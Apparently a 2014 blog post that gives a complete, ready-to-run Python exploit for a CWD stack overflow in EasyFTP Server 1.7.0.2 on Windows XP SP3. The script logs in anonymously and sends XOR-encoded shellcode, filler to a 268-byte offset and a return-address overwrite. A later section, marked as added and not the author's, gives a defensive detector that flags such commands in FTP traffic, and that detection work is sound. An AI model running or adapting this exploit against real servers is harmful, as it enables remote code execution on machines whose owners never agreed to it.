zcc1414


The target program is an FTP server.

Analyze the packets sent during login.

Then send 'CWD XXXXXX' to cause the overflow.

Get familiar with the FTP commands!!

The program also checks for certain characters...

I'm still not quite clear why the popup shows no text...

Environment: XP SP3 (Chinese)

easyftpsvr-1.7.0.2

import socket,sys
def ftp_test(ip,port):
	target = ip
	port = port
	# 198-byte encoded payload (the server filters some characters, hence the encoding)
	shellcode = ('\x50\x20'
		'\xD9\xEE'
		'\xD9\x74\x24\xF4'
		'\x58'
		'\x83\xC0\x1b'
		'\x33\xC9'
		'\x8A\x1C\x08'
		'\x80\xF3\x11'
		'\x88\x1C\x08'
		'\x41'
		'\x80\xFB\x90'
		'\x75\xF1'
		'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
		'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
		'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
		'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
		'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
		'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
		'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
		'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
		'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
		'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
		'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')#198

	# payload, then filler up to the 268-byte offset, then the 4-byte return address overwrite
	buffer =  shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d'
	#7D5F6FA0    59              pop ecx
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	try:
		connect = s.connect((target,port))
		print "[+] Connected!"
	except:
		print "[!] Connection failed!"
		sys.exit(0)
	# banner, then the anonymous login observed in the captured packets
	h = s.recv(1024)
	print h
	s.send('USER anonymous\r\n')
	h = s.recv(1024)
	print h
	s.send('PASS anonymous\r\n')
	h = s.recv(1024)
	print h
	print "[+] Sending buffer"
	s.send('CWD '+ buffer + '\r\n')
	# if the server is still answering, the overflow did not take
	try:
		h = s.recv(1024)
		print h
		print "failed"
	except:
		print "ok"

if __name__ == '__main__':
	ftp_test('127.0.0.1',21)
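Seen from the other side of the wire, the request above has a very distinctive shape: a CWD argument of 268 bytes, a block of non-printable bytes, and a long run of one filler character. The following is an added example (not the author's code, and not part of the original post) that parses FTP control-channel lines and flags commands with that shape, run over a constructed sample session. The 200-byte argument limit and the 32-byte repeat-run threshold are assumptions chosen for the example, not values from the server or the write-up.

```python
"""Flag FTP control-channel commands whose arguments look like a stack-overflow attempt."""
import re

# Assumed thresholds: the write-up overwrites the return address 268 bytes into the
# CWD argument, so anything near that length is far longer than any realistic path.
MAX_ARG_LEN = 200
REPEAT_RUN = re.compile(rb"(.)\1{31,}")  # 32+ copies of one byte, typical of filler


def parse_command(line):
    """Split one control-channel line into (VERB, argument bytes).

    Returns None for lines that are not FTP commands (e.g. server replies like '220 ...').
    """
    body = line.rstrip(b"\r\n")
    verb, _, arg = body.partition(b" ")
    if not (3 <= len(verb) <= 4 and verb.isalpha()):
        return None
    return verb.upper().decode("ascii"), arg


def inspect_command(line, max_arg_len=MAX_ARG_LEN):
    """Return the list of reasons a line looks suspicious; an empty list means it is clean."""
    parsed = parse_command(line)
    if parsed is None:
        return ["line is not a client command"]
    verb, arg = parsed
    reasons = []
    if len(arg) > max_arg_len:
        reasons.append("%s argument is %d bytes (limit %d)" % (verb, len(arg), max_arg_len))
    nonprintable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprintable:
        reasons.append("%s argument contains %d non-printable bytes" % (verb, nonprintable))
    if REPEAT_RUN.search(arg):
        reasons.append("%s argument contains a long run of one repeated byte" % verb)
    return reasons


def scan_session(lines):
    """Inspect every line of a captured session; return (index, preview, reasons) for each hit."""
    hits = []
    for index, line in enumerate(lines):
        reasons = inspect_command(line)
        if reasons:
            hits.append((index, line[:16], reasons))
    return hits


# Constructed sample session (not a real capture): a normal anonymous login, a benign
# CWD, and one CWD whose argument mimics the layout of the write-up's buffer: 40 opaque
# high bytes, 224 bytes of 'a' filler, then 4 placeholder bytes standing in for an address.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"CWD /pub/incoming\r\n",
    b"PWD\r\n",
    b"CWD " + bytes(range(0x80, 0x80 + 40)) + b"a" * 224 + b"\x01\x02\x03\x04" + b"\r\n",
]

if __name__ == "__main__":
    for index, preview, reasons in scan_session(SAMPLE_SESSION):
        print("line %d %r:" % (index, preview))
        for reason in reasons:
            print("  - " + reason)
```

Only the last sample line is reported, with all three reasons; the benign CWD and the argument-less PWD pass untouched. On a real server the same three checks belong in the command parser itself, rejecting the argument before it is ever copied into a fixed-size buffer.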

posted on 2014-04-11 15:27  zcc1414  Views (291)  Comments (0)